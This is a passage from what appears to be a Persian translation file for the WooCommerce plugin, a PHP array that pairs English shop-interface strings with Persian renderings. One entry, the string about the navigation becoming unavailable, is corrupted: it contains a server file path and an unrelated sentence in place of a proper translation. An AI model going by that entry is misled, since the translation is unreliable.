confirmation'=>'تأییدیۀ سفارش','Collection from %s:'=>'مجموعه از %s:','Error when setting property \'%1$s\' for order %2$d: %3$s'=>'خطا هنگام تنظیم ویژگی "%1$s" برای سفارش %2$d: %3$s','User #%d was deleted by WooCommerce in accordance with the site\'s personal data retention settings. Any content belonging to that user has been retained but unassigned.'=>'کاربر #%d مطابق با تنظیمات حفظ اطلاعات شخصی سایت توسط ووکامرس حذف شد. هر محتوایی که به آن کاربر تعلق دارد حفظ شده است اما اختصاص داده نشده است.','The Cart template displays the items selected by the user for purchase, including quantities, prices, and discounts. It allows users to review their choices before proceeding to checkout.'=>'قالب سبد خرید اقلامی را که کاربر برای خرید انتخاب کرده است، شامل تعداد، قیمت و تخفیف نمایش می دهد. این امکان را به کاربران می دهد تا انتخاب های خود را قبل از اقدام به پرداخت بررسی کنند.','Order number used for display.'=>'شماره سفارش برای نمایش استفاده می‌شود.','block titleProduct Template'=>'قالب محصول','block titleNewest Products'=>'جدیدترین محصولات','block keywordwoocommerce'=>'ووکامرس','block descriptionDisplay a grid of your newest products.'=>'شبکه‌ای از جدیدترین محصولات خود را نمایش دهید.','block titleTop Rated Products'=>'محصولات برتر','block descriptionDisplay a grid of your top rated products.'=>'یک شبکه از محصولات برتر شما را نمایش دهید.','block descriptionContains the block elements used to render a product.'=>'شامل عناصر بلوک مورد استفاده برای ارائه یک محصول است.','block descriptionDisplay a collection of products from your store.'=>'مجموعه ای از محصولات فروشگاه خود را نمایش دهید.','block titleProduct subsection'=>'زیربخش محصول','block titleProduct Rating'=>'امتیاز محصول','block descriptionDisplay the average rating of a product.'=>'نمایش میانگین امتیاز یک محصول.','Failed to save product.'=>'ذخیره محصول ناموفق بود.','Please enter a valid email address.'=>'لطفا یک آدرس ایمیل معتبر وارد کنید.','Automatically calculate how much sales tax should be collected – by city, country, or state.'=>'به طور خودکار محاسبه کنید که چقدر مالیات بر فروش باید جمع‌آوری شود - بر اساس شهر، کشور یا ایالت.','Get automated tax rates with WooCommerce Tax'=>'با WooCommerce Tax نرخ‌های مالیاتی را خودکار دریافت کنید','Reach millions of active shoppers across Google with free product listings and ads.'=>'با listings and ads رایگان به میلیون‌ها خریدار فعال در سراسر گوگل دسترسی پیدا کنید.','Invalid taxonomy: %s.'=>'طبقه‌بندی نامعتبر: %s.','WooPayments'=>'پرداخت‌های ووکامرس','Attempting to remigrate...'=>'در حال تلاش برای انتقال مجدد...','Create advertising campaigns and reach one billion global users.'=>'کمپین‌های تبلیغاتی ایجاد کنید و به یک میلیارد کاربر جهانی دسترسی پیدا کنید.','Create ad campaigns with TikTok'=>'در تیک‌تاک کمپین‌های تبلیغاتی ایجاد کنید','Send purchase follow-up emails, newsletters, and promotional campaigns.'=>'ایمیل‌های پیگیری خرید، خبرنامه‌ها و کمپین‌های تبلیغاتی را ارسال کنید.','Showcase your products with Pinterest'=>'محصولات خود را در پینترست به نمایش بگذارید','%s is not available for this order—please choose a different payment method'=>'%s برای این سفارش در دسترس نیست—لطفا روش پرداخت دیگری را انتخاب کنید','Reach your customers with MailPoet'=>'با MailPoet به مشتریان خود برسید','Get your products in front of a highly engaged audience.'=>'محصولات خود را در مقابل یک مخاطب بسیار فعال قرار دهید.','Securely accept payments and manage payment activity straight from your store\'s dashboard'=>'پرداخت ها را ایمن بپذیرید و فعالیت پرداخت را مستقیماً از داشبورد فروشگاه خود مدیریت کنید','%1$s #%2$s ‹ %3$s — WordPress'=>'%1$s #%2$s ‹ %3$s — وردپرس','%1$s ‹ %2$s — WordPress'=>'%1$s ‹ %2$s — وردپرس','Whether or not plugins step in core profiler was skipped.'=>'اینکه آیا مرحله افزونه‌ها در پروفایلر اصلی نادیده گرفته شده است یا خیر.','%s must be called after the current_screen action.'=>'%s باید بعد از اکشن current_screen فراخوانی شود.','%s is not a valid order type.'=>'%s یک نوع سفارش معتبر نیست.','%1$d error found: %2$s when re-migrating order. Please review the error above.'=>'%1$d خطا پیدا شد: %2$s هنگام انتقال مجدد سفارش. لطفا خطای بالا را بررسی کنید.','status labelsAll'=>'همه','Are you sure you want to delete this shipping method?'=>'آیا مطمئن هستید که می‌خواهید این روش ارسال را حذف کنید؟','Placeholder image used to represent a product being showcased in a hero section. 2 out of 2.'=>'نگهدارنده مکان تصویر برای نمایش محصولی که در بخش اصلی نمایش داده می‌شود، استفاده می‌شود. ۲ از ۲.','Placeholder image used to represent a product being showcased in a hero section. 1 out of 2.'=>'نگهدارنده مکان تصویر برای نمایش محصولی که در بخش اصلی نمایش داده می‌شود، استفاده می‌شود. ۱ از ۲.','Placeholder image used to represent a product being showcased in a hero section.'=>'نگهدارنده مکان تصویر برای نمایش محصولی که در بخش اصلی نمایش داده می‌شود، استفاده می‌شود.','Placeholder image used to represent products being showcased in featured categories banner. 3 out of 3'=>'نگهدارنده مکان تصویر مورد استفاده برای نمایش محصولاتی که در بنر دسته‌های ویژه به نمایش گذاشته می‌شوند. ۳ از ۳','Placeholder image used to represent products being showcased in a banner.'=>'نگهدارنده مکان تصویر، برای نمایش محصولاتی که در بنر به نمایش گذاشته می‌شود، استفاده می‌شود.','There was an error deleting an action: %s'=>'هنگام حذف اقدام، خطایی رخ داد: %s','Unable to update the status of action %1$d to %2$s.'=>'امکان به روز رسانی وضعیت عملکرد %1$d تا %2$s وجود ندارد.','status labelsPast-due'=>'معوقه','Placeholder image used to represent products being showcased in featured categories banner. 2 out of 3.'=>'نگهدارنده مکان تصویر مورد استفاده برای نمایش محصولاتی که در بنر دسته‌های ویژه به نمایش گذاشته می‌شوند. ۲ از ۳.','Placeholder image used to represent products being showcased in featured categories banner. 1 out of 3.'=>'نگهدارنده مکان تصویر مورد استفاده برای نمایش محصولاتی که در بنر دسته‌های ویژه به نمایش گذاشته می‌شوند. ۱ از ۳.','An integer was expected but "%1$s" (%2$s) was received.'=>'انتظار می‌رفت یک عدد صحیح دریافت شود، اما "%1$s" (%2$s) دریافت شد.','It was not possible to determine a valid cut-off time: %s.'=>'تعیین زمان پایان معتبر امکان‌پذیر نبود: %s.','Shipping method could not be removed. Please retry.'=>'روش ارسال قابل حذف نیست. لطفا دوباره امتحان کنید.','%d action deleted.'=>'%d اقدامات حذف شد.','%d batch processed.'=>'%d دسته پردازش شد.','Saint Thomas Lowland'=>'سنت توماس لولند','Trinity Palmetto Point'=>'ترینیتی پالمئتو پوینت','Saint Peter Basseterre'=>'سنت پیتر باستر','Saint Paul Charlestown'=>'سنت پل چارلستون','Saint Paul Capisterre'=>'سنت پل کپیستر','Saint Mary Cayon'=>'سنت مری کیون','Saint John Figtree'=>'سنت جان فیگتری','Saint John Capisterre'=>'سنت جان کپیستر','Saint James Windward'=>'سنت جیمز ویندوارد','Saint George Gingerland'=>'سنت جرج جینجرلند','Saint Anne Sandy Point'=>'سنت ان سندی پوینت','Saint George Basseterre'=>'سنت جرج باستر','Nevis'=>'نویس','Saint Kitts'=>'سنت کیتس','Saint Thomas Middle Island'=>'جزیره سنت توماس میدل','Christ Church Nichola Town'=>'کرایست چرچ نیکلا تاون','We were unable to verify the email address you provided. Please try again.'=>'ما نتوانستیم آدرس ایمیلی که ارائه کرده‌اید را تأیید کنیم. لطفا دوباره تلاش کنید.','Please log in to your account to view this order.'=>'لطفا برای مشاهده این سفارش وارد حساب کاربری خود شوید.','To view this page, you must either %1$slogin%2$s or verify the email address associated with the order.'=>'برای مشاهده این صفحه، باید %1$sورود%2$s یا آدرس ایمیل مرتبط با سفارش را تأیید کنید.','Verify'=>'تایید','block descriptionBlock that displays the \'Your cart\' part of the Mini-Cart Title block.'=>'بلوکی که بخش «سبد خرید شما» از بلوک عنوان سبد خرید کوچک را نشان می‌دهد.','block keyworddescription'=>'توضیح','block keywordquantity'=>'تعداد','block titleProduct regular price'=>'قیمت عادی محصول','block descriptionDisplay a product’s SKU, categories, tags, and more.'=>'نمایش شناسه محصول، دسته‌ها، برچسب‌ها و موارد دیگر.','block titleAdd to Cart with Options'=>'افزودن به سبد خرید با گزینه ها','block titleProduct toggle control'=>'کنترل تعویض محصول','block titleProduct inventory quantity available'=>'مقدار موجودی محصول موجود است','block titleMini-Cart Title Label'=>'برچسب عنوان سبد خرید کوچک','block descriptionBlock that displays the items counter part of the Mini-Cart Title block.'=>'بلوکی که قسمت شمارندۀ اقلام بلوک عنوان سبد خرید کوچک را نمایش می‌دهد.','block titleMini-Cart Title Items Counter'=>'شمارندۀ اقلام عنوان سبد خرید کوچک','block titleProduct sale price'=>'قیمت حراج محصول','block descriptionThe product toggle.'=>'تعویض محصول.','block descriptionThe product available quantity.'=>'مقدار محصول موجود.','block keywordattributes'=>'ویژگی‌ها','block titleProduct Category Title'=>'عنوان دسته محصول','block titleProduct description'=>'توضیح محصول','block descriptionThe product description.'=>'توضیح محصول.','block descriptionThe product attributes.'=>'ویژگی‌های محصول.','block titleProduct attributes'=>'ویژگی های محصول','block descriptionA field to select product tags.'=>'فیلدی برای انتخاب برچسب‌های محصول.','block keywordby category'=>'بر اساس دسته‌بندی','After that they can be reassigned to the logged-in user by going to the WooCommerce webhooks settings page and re-saving them.'=>'پس از آن می‌توان با رفتن به صفحه تنظیمات وب هوک های ووکامرس و ذخیره مجدد آنها را به کاربر وارد شده مجدداً اختصاص داد.','The affected WooCommerce webhooks will not be deleted and will be attributed to user id 0.
'=>'وب‌قلاب‌های ووکامرس تحت تأثیر حذف نمی‌شوند و به شناسه کاربر 0 نسبت داده می‌شوند.
','If the "Delete all content" option is selected, the affected WooCommerce webhooks will not be deleted and will be attributed to user id 0.
'=>'اگر گزینه "حذف تمام محتوا" انتخاب شود، وب هوک های ووکامرس تحت تأثیر حذف نمی شوند و به شناسه کاربر 0 نسبت داده می شوند.
','user webhook countUser #%1$s %2$s has created %3$d WooCommerce webhook.'=>'کاربر #%1$s %2$s ایجاد کرده است %3$d وب هوک ووکامرس.','%s is currently editing this order. Do you want to take over?'=>'%s در حال ویرایش این سفارش است. میخوای تحویل بگیری؟','Passed order type does not match any registered order types. Following order types are registered: %s'=>'نوع سفارش پاس شده با هیچ نوع سفارش ثبت شده مطابقت ندارد. انواع سفارش های زیر ثبت می شوند: %s','Order %s is locked.'=>'سفارش %s قفل شده است.','Take over'=>'به عهده بگیرید','%s has taken over and is currently editing.'=>'%s مسئولیت را بر عهده گرفته و در حال ویرایش است.','What makes this product unique? What are its most important features? Enrich the product page by adding rich content using blocks.'=>'چه چیزی این محصول را منحصر به فرد می کند؟ مهم ترین ویژگی های آن چیست؟ با افزودن محتوای غنی با استفاده از بلوک ها، صفحه محصول را غنی کنید.','held stock noteStock hold of %1$s minutes applied to: %2$s'=>'نگهداری موجودی %1$s دقیقه اعمال شد روی: %2$s','Go back'=>'برگشت','held stock note- %1$s × %2$d'=>'- %1$s اقلام %2$d','held stock note- ...and %d more item.'=>'- …و %d اقلام بیشتر.','Slug of the resource.'=>'عدد Slug منبع.','Limit result set to products with specific slug(s). Use commas to separate.'=>'محدود کردن نتایج به محصولاتی که slug(s) مد نظر شما را دارند. برای جدا کردن شروط از کاما ی انگلیسی استفاده کنید.','Name of credit cardJCB'=>'JCB','Name of credit cardDiners'=>'Diners','Log out'=>'بیرون رفتن','Adding new attribute failed.'=>'افزودن ویژگی جدید ناموفق بود.','This product has multiple variants. The options may be chosen on the product page'=>'این محصول دارای انواع مختلفی می باشد. گزینه ها ممکن است در صفحه محصول انتخاب شوند','Powered by %1$s with %2$s'=>'قدرت گرفته از %1$s توسط %2$s','Invalid product slug.'=>'عدد slug صحیح نیست.','Name of credit cardAmerican Express'=>'American Express','Name of credit cardDiscover'=>'Discover','Name of credit cardVisa'=>'Visa','Name of credit cardMasterCard'=>'MasterCard','(%s customer review)'=>'(%s نظرات مشتریان)','%qty% variations added'=>'%qty% تنوع اضافه شد','%s variations imported'=>'%s تنوع درون‌ریزی شد','block descriptionBlock that displays the checkout button when the Mini-Cart has products.'=>'بلوکی که وقتی مینی سبد دارای محصولات است، دکمه پرداخت را نشان می دهد.','block titleMini-Cart Proceed to Checkout Button'=>'مینی سبد خرید ادامه به دکمه پرداخت','block keywordtab'=>'زبانه','block keywordexcerpt'=>'چکیده','block keywordsummary'=>'خلاصه','block titleProduct Reviews'=>'بررسی‌های محصول','block keywordgroup'=>'گروه','block keywordsection'=>'بخش','block keywordprice'=>'قیمت','block keywordtitle'=>'عنوان','block keywordname'=>'نام','block descriptionThe product name.'=>'نام محصول.','block titleProduct name'=>'نام محصول','block keywordgallery'=>'گالری','block keywordimages'=>'تصاویر','block keywordimage'=>'تصویر','block descriptionThe product images.'=>'تصاویر محصول.','block titleProduct images'=>'تصاویر محصول','block keywordemail'=>'ایمیل','block titleCollapsible'=>'تاشو','block titleProduct section'=>'بخش محصول','block descriptionThe product section.'=>'بخش محصول.','block keyworddimensions'=>'ابعاد','block keywordshipping'=>'حمل و نقل','block keywordsale'=>'حراج','block keywordschedule'=>'زمان‌بندی','block descriptionThe product schedule sale fields.'=>'فیلدهای زمانبندی حراج محصول.','block titleProduct schedule sale fields'=>'فیلدهای زمانبندی حراج محصول','block keywordminimum'=>'حداقل','block descriptionStock management minimum quantity.'=>'مدیریت حداقل تعداد موجودی.','block keywordinput'=>'ورودی','block titleStock level threshold'=>'آستانه سطح موجودی','block titleConditional'=>'شرطی','block titleProduct pricing'=>'قیمت گذاری محصول','block descriptionThe product sku.'=>'شناسه محصول.','block descriptionA product price block with currency display.'=>'بلوک قیمت محصول با نمایش ارز.','block keywordproducts'=>'محصولات','block descriptionContainer with collapsible inner blocks.'=>'ظرف با بلوک های داخلی تاشو.','block titleProduct text control'=>'کنترل متن محصول','block titleProduct shipping dimensions fields'=>'فیلدهای ابعاد حمل و نقل محصول','block keywordradio'=>'رادیو','block style labelOutline'=>'خارج خط','block keywordinventory'=>'موجودی کالا','block keywordcheckbox'=>'چک‌باکس','block titleProduct checkbox control'=>'کنترل چک باکس محصول','block descriptionContainer to only conditionally render inner blocks.'=>'ظرفی که فقط بلوک های داخلی را به صورت مشروط ارائه می کند.','block keywordclass'=>'کلاس','block titleProduct shipping class field'=>'فیلد کلاس حمل و نقل محصول','block descriptionThe product shipping class field.'=>'فیلد کلاس حمل و نقل محصول.','block titleProduct radio control'=>'کنترل رادیو محصول','block keywordtag'=>'برچسب','block titleMini-Cart View Cart Button'=>'دکمه مشاهده سبدخرید جزئی','block descriptionBlock that displays the cart button when the Mini-Cart has products.'=>'بلوکی که دکمه سبد خرید را زمانی که مینی سبد محصولاتی دارد نمایش می دهد.','block style labelFill'=>'کامل','block descriptionThe product shipping dimensions fields.'=>'فیلدهای ابعاد حمل و نقل محصول.','block descriptionThe product radio.'=>'رادیو محصول.','block descriptionThe product tab.'=>'زبانه محصول.','block titleProduct tab'=>'زبانه محصول','block descriptionThe product summary.'=>'خلاصه محصول.','block titleProduct summary'=>'خلاصه محصول','block keywordsku'=>'شناسه','Give your customers the power to pay later, interest free and watch your sales grow.'=>'به مشتریان خود این قدرت را بدهید که بدون بهره، بعداً پرداخت کنند و رشد فروش خود را تماشا کنید.','Payoneer Checkout is the next generation of payment processing platforms, giving merchants around the world the solutions and direction they need to succeed in today’s hyper-competitive global market.'=>'پرداخت پایونیر (Payoneer Checkout) نسل بعدی پلتفرم‌های پردازش پرداخت است که به بازرگانان در سراسر جهان، راهکارها و جهت‌گیری لازم برای موفقیت در بازار جهانی فوق‌العاده رقابتی امروز را ارائه می‌دهد.','Zip Co - Buy Now, Pay Later'=>'الان بخرید، بعداً پرداخت کنید','Payoneer Checkout'=>'سبد خرید پایونیر','Fees & dimensions'=>'هزینه‌ها و ابعاد','Is store connected to WooCommerce.com?'=>'آیا فروشگاه به WooCommerce.com متصل است؟','Is HPOS enabled?'=>'آیا HPOS فعال است؟','HPOS enabled:'=>'HPOS فعال شد:','The following problems were found:'=>'مشکلات زیر پیدا شد:','Enforce approved download directories?'=>'مسیرهای پذیرفته‌شدۀ بارگیری اجرا شود؟','Visit product category %1$s'=>'از دسته محصول بازدید نمایید %1$s','Download for support'=>'دریافت برای پشتیبانی','Drag images, upload new ones or select files from your library. For best results, use JPEG files that are 1000 by 1000 pixels or larger. %1$sHow to prepare images?%2$s'=>'تصاویر را بکشید، تصاویر جدید آپلود کنید یا فایل‌هایی را از کتابخانه خود انتخاب کنید. برای بهترین نتیجه، از فایل‌های JPEG با ابعاد ۱۰۰۰ در ۱۰۰۰ پیکسل یا بزرگتر استفاده کنید. %1$sچگونه تصاویر را آماده کنیم؟%2$s','List of available payment method IDs that can be used to process the order.'=>'فهرست شناسه‌های روش پرداخت موجود که می‌توان از آنها برای پردازش سفارش استفاده کرد.','When checked, customers will be able to purchase only 1 item in a single order. This is particularly useful for items that have limited quantity, like art or handmade goods.'=>'در صورت بررسی، مشتریان می توانند تنها 1 مورد را در یک سفارش خریداری کنند. این به ویژه برای اقلامی مفید است که تعداد محدودی دارند، مانند هنر یا کالاهای دست ساز.','Set up and manage inventory for this product, including status and available quantity. %1$sManage store inventory settings%2$s'=>'موجودی این محصول از جمله وضعیت و مقدار موجود را تنظیم و مدیریت کنید. %1$sتنظیمات موجودی فروشگاه%2$s را مدیریت کنید','Order datastore.'=>'فروشگاه داده را سفارش دهید.','Apply a tax rate if this product qualifies for tax reduction or exemption. %1$sLearn more%2$s'=>'اگر این محصول واجد شرایط کاهش یا معافیت مالیاتی باشد، نرخ مالیاتی را اعمال کنید. %1$sبیشتر بیاموزید%2$s','No variations yet. Generate them from all added attributes or add a new variation manually.'=>'هنوز تنوعی وجود ندارد. آنها را از تمام ویژگی های اضافه شده ایجاد کنید یا به صورت دستی یک تنوع جدید اضافه کنید.','Generate variations'=>'تولید تنوع','Add some attributes in the Attributes tab to generate variations. Make sure to check the Used for variations box. Learn more'=>'ویژگی در ویژگی‌ها ایجاد کنید تا تنوع تولید شود.مطمئن شوید که گزینه استفاده برای تنوع را انتخاب کرده باشد.اطلاعات بیشتر','Is HPOS sync enabled?'=>'آیا همگام سازی HPOS فعال است؟','Set up shipping costs and enter dimensions used for accurate rate calculations. %1$sHow to get started?%2$s'=>'هزینه های حمل و نقل را تنظیم کنید و ابعاد مورد استفاده برای محاسبه دقیق نرخ را وارد کنید. %1$sچگونه شروع کنیم؟%2$s','New attribute'=>'ویژگی تازه','Create value'=>'ایجاد مقدار','Add existing'=>'ویژگی موجود','If you remove this attribute, customers will no longer be able to purchase some variations of this product.'=>'اگر این ویژگی را حذف کنید، مشتریان، دیگر نمی‌توانند برخی از انواع این محصول را خریداری کنند.','block titleProduct Details'=>'جزئیات محصول','block titleProduct Meta'=>'متای محصول','block titleRelated Products'=>'محصولات مرتبط','block descriptionDisplay related products.'=>'نمایش محصولات مرتبط.','block titleAdd to Cart Button'=>'دکمۀ افزودن به سبد خرید','Save time and money by printing your shipping labels right from your computer with WooCommerce Shipping. Try WooCommerce Shipping for free.'=>'با چاپ برچسب های حمل و نقل مستقیماً از رایانه خود با حمل و نقل ووکامرس در زمان و هزینه خود صرفه جویی کنید. ارسال رایگان ووکامرس را امتحان کنید.','Optimize for faster checkout'=>'برای تسویه حساب سریعتر بهینه سازی کنید','Campaign'=>'کمپین','Cart & Checkout Blocks'=>'بلوک های سبد خرید و پرداخت','Available layouts -- single, dual, or both'=>'طرح‌بندی‌های موجود -- تک، دوتایی یا هر دو','Array of transaction processors and their images.'=>'مجموعه ای از پردازنده های تراکنش و تصاویر آنها.','Shop'=>'فروشگاه','Coupon applied: "%s".'=>'کوپن اعمال شد: "%s".','Learn more link .'=>'لینک بیشتر بدانید.','placeholder for search fieldSearch products…'=>'جستجوی محصولات…','Plugin slug used in https://wordpress.org/plugins/{slug}.'=>'نامک افزونه در https://wordpress.org/plugins/{slug} استفاده شده است.','Return the default shipping partner suggestions when woocommerce_show_marketplace_suggestions option is set to no'=>'وقتی گزینه woocommerce_show_marketplace_suggestions روی no تنظیم شده است، پیشنهادات پیشفرض شریک حمل و نقل را برگردانید','Message explaining that there are no products returned from a searchNo products were found matching your selection.'=>'هیچ محصولی مطابق با انتخاب شما یافت نشد.','Basic details'=>'جزئیات اولیه','Coupon removed: "%s".'=>'کوپن حذف شد: "%s".','Track stock quantity for this product'=>'ردیابی مقدار موجودی این محصول','Autodetect'=>'شناسایی خودکار','Make sure you enter the name and values for each attribute.'=>'مطمئن شوید که نام و مقادیر هر ویژگی را وارد کرده اید.','Character encoding of the file'=>'رمزگذاری کاراکتر فایل','Disabled in store settings.'=>'غیرفعال شد در تنظیمات فروشگاه.','Enter options for customers to choose from, f.e. “Blue” or “Large”. Use “%s” to separate different options.'=>'گزینه‌هایی را وارد کنید تا مشتریان از بین آنها انتخاب کنند، برای مثال "آبی" یا "بزرگ". از "%s" برای جدا کردن گزینه‌های مختلف استفاده کنید.','Settings below apply to all variations without manual stock management enabled. '=>'تنظیمات زیر برای همه متغیر‌ها بدون فعال بودن مدیریت انبار دستی اعمال می‌شود. ','Stock management'=>'مدیریت موجودی','Stock management disabled in store settings'=>'مدیریت موجودی در تنظیمات فروشگاه غیرفعال است','block titleStore Notices'=>'اطلاعیه‌های فروشگاه','block descriptionDisplay the number of products on the archive page or search result page.'=>'نمایش تعداد محصولات در صفحه آرشیو یا صفحه نتایج جستجو.','block titleProduct Results Count'=>'تعداد نتایج محصول','block descriptionEnable customers to change the sorting order of the products.'=>'مشتریان را قادر می سازد تا ترتیب مرتب سازی محصولات را تغییر دهند.','block titleCatalog Sorting'=>'مرتب سازی کاتالوگ','block titleProduct Image Gallery'=>'گالری تصاویر محصول','block descriptionEnable customers to keep track of their location within the store and navigate back to parent pages.'=>'به مشتریان امکان دهید موقعیت مکانی خود را در فروشگاه پیگیری کنند و به صفحات والد (سرآغاز) برگردند.','block descriptionDisplay shopper-facing notifications generated by WooCommerce or extensions.'=>'اعلان‌های خریدار را که توسط ووکامرس یا افزونه‌ها تولید می‌شوند، نمایش دهید.','block titleStore Breadcrumbs'=>'مسیر راهنمای فروشگاه','block descriptionDisplay a product\'s images.'=>'نمایش تصاویر یک محصول.','Powerful yet easy-to-use solution:'=>'راه حل قدرتمند و در عین حال آسان برای استفاده:','30-day free trial'=>'۳۰ روز استفاده آزمایشی رایگان','Access competitive shipping prices'=>'دسترسی به قیمت های رقابتی حمل و نقل','Quickly bulk print labels'=>'به سرعت لیبل ها را به صورت عمده چاپ کنید','Free shipping platform'=>'پلت فرم حمل و نقل رایگان','Optimize your full shipping process:'=>'فرآیند حمل و نقل کامل خود را بهینه کنید:','Shop for the best shipping rates, and access pre-negotiated discounted rates.'=>'بهترین نرخ‌های حمل و نقل را خریداری کنید و به نرخ‌های تخفیفی از قبل مذاکره شده دسترسی داشته باشید.','Save money'=>'پس انداز کنید','Automatically import order information to quickly print your labels.'=>'اطلاعات سفارش را به صورت خودکار وارد کنید تا به سرعت برچسب های خود را چاپ کنید.','Save time'=>'صرفه جویی در زمان','Date created'=>'تاریخ ایجاد','Database date field considered for Revenue and Orders reports'=>'فیلد تاریخ پایگاه داده برای گزارش‌های درآمد و سفارش‌ها در نظر گرفته شده است','Date Type'=>'نوع تاریخ','You are missing required arguments of WooCommerce ProductForm Tab: %1$s'=>'شما آرگومان های مورد نیاز برگه WooCommerce ProductForm را از دست داده اید: %1$s','Direct access to leading carriers'=>'دسترسی مستقیم به اپراتورهای پیشرو','Automated, real-time order import'=>'درون‌ریزی بی‌درنگ و خودکار سفارش','Keep your customers informed with tracking notifications.'=>'با اعلان‌های رهگیری، مشتریان خود را در جریان بگذارید.','Invalid parameter.'=>'پارامتر نامعتبر.','Invalid parameter(s): %s'=>'پارامتر(های) نامعتبر: %s','formatted dimensions%1$s %2$s'=>'%1$s %2$s','formatted weight%1$s %2$s'=>'%1$s %2$s','Add descriptive pieces of information that customers can use to search for this product on your store, such as “Material” or “Size”.'=>'اطلاعات توصیفی را اضافه کنید که مشتریان می‌توانند از آنها برای جستجوی این محصول در فروشگاه شما استفاده کنند، مانند "مواد" یا "اندازه".','block titleCustomer account'=>'حساب مشتری','block descriptionA block that allows your customers to log in and out of their accounts in your store.'=>'بلوکی که به مشتریان شما این امکان را می‌دهد تا به حساب‌های خود در فروشگاه شما وارد یا از آن خارج شوند.','block descriptionDisplay shipping options and rates for your store.'=>'گزینه‌ها و نرخ‌های حمل و نقل را برای فروشگاه خود نمایش دهید.','block descriptionSelect between shipping or local pickup.'=>'بین حمل و نقل یا دریافت حضوری انتخاب کنید.','block descriptionShows local pickup locations.'=>'مکان‌های دریافت حضوری را نمایش می‌دهد.','block titlePickup Method'=>'روش دریافت حضوری','Pickup details'=>'جزئیات دریافت حضوری','Increase quantity of %s'=>'افزایش تعداد %s','Reduce quantity of %s'=>'کاهش تعداد %s','Remove %s from cart'=>'حذف %s از سبد خرید','Only shipping'=>'فقط ارسال','Don\'t charge tax'=>'مالیات نگیرید','Product and shipping'=>'محصول و ارسال','Charge sales tax on'=>'گرفتن مالیات فروش روی','Try the new product editor (Beta)'=>'امتحان ویرایشگر محصول جدید (بتا)','New product editor'=>'ویرایشگر جدید محصول','%1$s class does not exist.'=>'کلاس %1$s وجود ندارد.','Invalid meta_query clause key: %s.'=>'کلید عبارت meta_query نامعتبر: %s.','Sorry, you cannot view marketing channels.'=>'با عرض پوزش، شما نمی‌توانید کانال‌های بازاریابی را مشاهده کنید.','Number of channel issues/errors (e.g. account-related errors, product synchronization issues, etc.).'=>'تعداد مشکلات/خطاهای کانال (به عنوان مثال، خطاهای مربوط به حساب، مشکلات همگام‌سازی محصول و غیره).','Marketing channel cannot be registered because there is already a channel registered with the same slug!'=>'کانال بازاریابی را نمی‌توان ثبت کرد زیرا قبلاً یک کانال با همان نامک ثبت شده است!','You are missing required arguments of WooCommerce ProductForm Field: %1$s'=>'شما آرگومان‌های مورد نیاز فیلد فرم محصول ووکامرس را از فراموش کرده‌اید: %1$s','You are missing required arguments of WooCommerce ProductForm Section: %1$s'=>'شما آرگومان های مورد نیاز بخش WooCommerce ProductForm را ندارید: %1$s','You have attempted to register a duplicate form %1$s with WooCommerce Form: %2$s'=>'شما سعی کرده اید یک فرم تکراری %1$s را با فرم WooCommerce ثبت کنید: %2$s','The specified category for recommendations is invalid. Allowed values: "channels", "extensions".'=>'دسته مشخص شده برای توصیه ها نامعتبر است. مقادیر مجاز: "channels"، "extensions".','Unable to load child product %1$d while adjusting download permissions for product %2$d.'=>'هنگام تنظیم مجوزهای دانلود برای محصول %2$d، محصول فرزند %1$d بارگیری نشد.','%1$s This navigation will soon become unavailable while we make necessary improvements. /home/filetir/public_html/wp-content/languages/plugins/woocommerce-fa_IR.l10n.php: اگر الان آن را خاموش کنید، دیگر نمی‌توانید آن را دوباره روشن کنید..','Sorry, you are not allowed to retrieve product form data.'=>'متاسفانه ! شما مجاز به دریافت داده‌های فرم محصول نیستید.','Status of the marketing channel\'s product listings.'=>'وضعیت لیست محصولات کانال بازاریابی.','URL to the settings page, or the link to complete the setup/onboarding if the channel has not been set up yet.'=>'نشانی وب صفحه تنظیمات یا پیوند تکمیل راه‌اندازی/عضویت اگر کانال هنوز راه‌اندازی نشده است.','Whether or not the marketing channel is set up.'=>'این که آیا کانال بازاریابی راه اندازی شده است یا خیر.','Path to the channel icon.'=>'مسیر به نماد کانال.','Unique identifier string for the marketing channel extension, also known as the plugin slug.'=>'رشته شناسه منحصر به فرد برای پسوند کانال بازاریابی، که به عنوان Slug افزونه نیز شناخته می شود.','Name of the marketing channel.'=>'نام کانال بازاریابی.','Description of the marketing channel.'=>'توضیحات کانال بازاریابی.','My Account'=>'حساب کاربری من','async'=>'غیر همزمان','Invalid Rate ID.'=>'شناسه نرخ نامعتبر است.','Title of the marketing campaign.'=>'عنوان کمپین بازاریابی.','The unique identifier of the marketing channel that this campaign type belongs to.'=>'شناسه منحصر به فرد کانال بازاریابی که این نوع کمپین به آن تعلق دارد.','The name of the marketing channel that this campaign type belongs to.'=>'نام کانال بازاریابی که این نوع کمپین به آن تعلق دارد.','URL to the create campaign page for this campaign type.'=>'نشانی اینترنتی ایجاد صفحه کمپین برای این نوع کمپین.','Permalink template for the product.'=>'قالب پیوند یکتا برای محصول.','Slug automatically generated from the product name.'=>'نامک بصورت خودکار از نام محصول تولید گردید.','The unique identifier for the marketing campaign.'=>'شناسه منحصر به فرد برای کمپین بازاریابی.','The unique identifier for the marketing channel that this campaign belongs to.'=>'شناسه منحصر به فرد کانال بازاریابی که این کمپین به آن تعلق دارد.','The unique identifier for the marketing campaign type.'=>'شناسه منحصر به فرد برای نوع کمپین بازاریابی.','This action appears to be consistently failing. A new instance will not be scheduled.'=>'به نظر می رسد این اقدام به طور مداوم در حال شکست است. نمونه جدیدی برنامه ریزی نمی شود.','The marketing channel that this campaign type belongs to.'=>'کانال بازاریابی که این نوع کمپین به آن تعلق دارد.','If enabled, this method will appear on the block based checkout.'=>'اگر فعال باشد، این روش در پرداخت مبتنی بر بلوک، نمایش داده می‌شود.','The ID of the package being shipped. Leave blank to apply to all packages.'=>'شناسه بسته در حال ارسال. خالی بگذارید تا برای همه بسته‌ها اعمال شود.','Unable to create or write to %s during CSV export. Please check file permissions.'=>'ایجاد یا نوشتن در %s در حین خروجی گرفتن از CSV ممکن نیست. لطفا مجوزهای فایل را بررسی کنید.','Allow customers to choose a local pickup location during checkout.'=>'به مشتریان اجازه دهید در حین تسویه‌حساب، محل دریافت حضوری را انتخاب کنند.','Optional cost to charge for local pickup.'=>'مبلغ اختیاری برای هزینه دریافت حضوری.','Pickup address'=>'آدرس دریافت حضوری','Pickup location'=>'موقعیت دریافت حضوری','If a cost is defined, this controls if taxes are applied to that cost.'=>'اگر قیمتی تعریف شده باشد، این فیلد اعمال مالیات بر آن قیمت را کنترل می‌کند.','Unable to release actions from claim id %d.'=>'حذف اقدامات از شناسه مطالبه شده %d ممکن نیست.','The value type 